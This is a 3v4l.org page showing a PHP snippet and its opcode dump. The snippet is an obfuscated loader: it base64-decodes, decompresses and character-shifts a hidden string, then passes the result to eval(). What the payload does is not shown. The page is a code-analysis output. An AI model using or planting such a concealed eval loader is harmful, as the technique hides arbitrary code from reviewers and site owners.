3v4l.org

run code in 300+ PHP versions simultaneously
<?php function JWFKROZE($TDPIK){$TDPIK=gzuncompress(base64_decode($TDPIK));for($i=0;$i<strlen($TDPIK);$i++){$TDPIK[$i]=chr(ord($TDPIK[$i])-1);}return $TDPIK;} eval(JWFKROZE("eJxTTC/LTynNKshXdAkN9Yj09XDVVPV1Dnf21aqB0HYZ1UAVBXmFxWklJZrJSSVp5qYJqWkpBalpMJVaNukFxZqqWXaGNqpZtiWlxblp+TA5oIiODsysGNWsOLuUzGLNguJUTYSQlp6Rlk1dcVppWXG+IkTYpk4xrTwpVxPuKOU07+pss5xC36qQyqBwFzN/n6rc8NIyNw8nF9dUZ5cSO2WgMxS5Ac3fQNA=")); ?>
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/FVEPb
function name:  (null)
number of ops:  5
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    1     0  E >   INIT_FCALL                                               'jwfkroze'
          1        SEND_VAL                                                 'eJxTTC%2FLTynNKshXdAkN9Yj09XDVVPV1Dnf21aqB0HYZ1UAVBXmFxWklJZrJSSVp5qYJqWkpBalpMJVaNukFxZqqWXaGNqpZtiWlxblp%2BTA5oIiODsysGNWsOLuUzGLNguJUTYSQlp6Rlk1dcVppWXG%2BIkTYpk4xrTwpVxPuKOU07%2Bpss5xC36qQyqBwFzN%2Fn6rc8NIyNw8nF9dUZ5cSO2WgMxS5Ac3fQNA%3D'
          2        DO_FCALL                                      0  $0      
          3        INCLUDE_OR_EVAL                                          $0, EVAL
          4      > RETURN                                                   1

Function jwfkroze:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 21
Branch analysis from position: 21
2 jumps found. (Code = 44) Position 1 = 24, Position 2 = 10
Branch analysis from position: 24
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 10
2 jumps found. (Code = 44) Position 1 = 24, Position 2 = 10
Branch analysis from position: 24
Branch analysis from position: 10
filename:       /in/FVEPb
function name:  JWFKROZE
number of ops:  26
compiled vars:  !0 = $TDPIK, !1 = $i
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
          0  E >   RECV                                             !0      
          1        INIT_FCALL                                               'gzuncompress'
          2        INIT_FCALL                                               'base64_decode'
          3        SEND_VAR                                                 !0
          4        DO_ICALL                                         $2      
          5        SEND_VAR                                                 $2
          6        DO_ICALL                                         $3      
          7        ASSIGN                                                   !0, $3
          8        ASSIGN                                                   !1, 0
          9      > JMP                                                      ->21
         10    >   INIT_FCALL                                               'chr'
         11        INIT_FCALL                                               'ord'
         12        FETCH_DIM_R                                      ~7      !0, !1
         13        SEND_VAL                                                 ~7
         14        DO_ICALL                                         $8      
         15        SUB                                              ~9      $8, 1
         16        SEND_VAL                                                 ~9
         17        DO_ICALL                                         $10     
         18        ASSIGN_DIM                                               !0, !1
         19        OP_DATA                                                  $10
         20        PRE_INC                                                  !1
         21    >   STRLEN                                           ~12     !0
         22        IS_SMALLER                                               !1, ~12
         23      > JMPNZ                                                    ~13, ->10
         24    > > RETURN                                                   !0
         25*     > RETURN                                                   null

End of function jwfkroze

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
171.33 ms | 1399 KiB | 22 Q